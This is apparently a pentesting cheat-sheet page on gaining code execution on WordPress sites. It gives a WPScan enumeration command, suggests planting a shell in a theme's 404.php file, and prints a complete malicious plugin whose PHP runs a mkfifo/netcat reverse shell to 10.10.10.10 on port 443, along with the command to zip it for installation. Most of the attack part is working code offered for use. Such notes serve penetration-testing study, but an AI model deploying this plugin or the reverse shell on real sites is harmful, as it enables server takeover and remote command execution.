Wordpress

WordPress is probably the most common CMS on the internet.

WPScan

wpscan --url http://example.com -e ap,at,cb,dbe,u1-5,m1-15 --api-token <APITOKEN>

From Admin to RCE

Theme Editor

We can modify a theme by adding a reverse shell or a webshell to its 404.php file.

Installing Plugin

Another way to obtain a reverse shell is to upload and install a plugin. The header comment lines are required for the installation to succeed.

<?php
    /*
    Plugin Name: HackinNotes Wordpress Shell
    Plugin URI: https://github.com/leonjza/wordpress-shell
    Description: Execute Commands as the webserver you are serving wordpress with! Shell will probably live at /wp-content/plugins/shell/shell.php. Commands can be given using the 'cmd' GET parameter. Eg: "http://192.168.0.1/wp-content/plugins/shell/shell.php?cmd=id", should provide you with output such as <code>uid=33(www-data) gid=33(www-data) groups=33(www-data)</code>
    Author: Leon Jacobs
    Version: 0.3
    Author URI: https://leonjza.github.io
    */

system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 443 >/tmp/f");?>

After that, we just need to zip it and install it.

zip revshell-plugin.zip revshell-plugin.php

Last updated 3 years ago
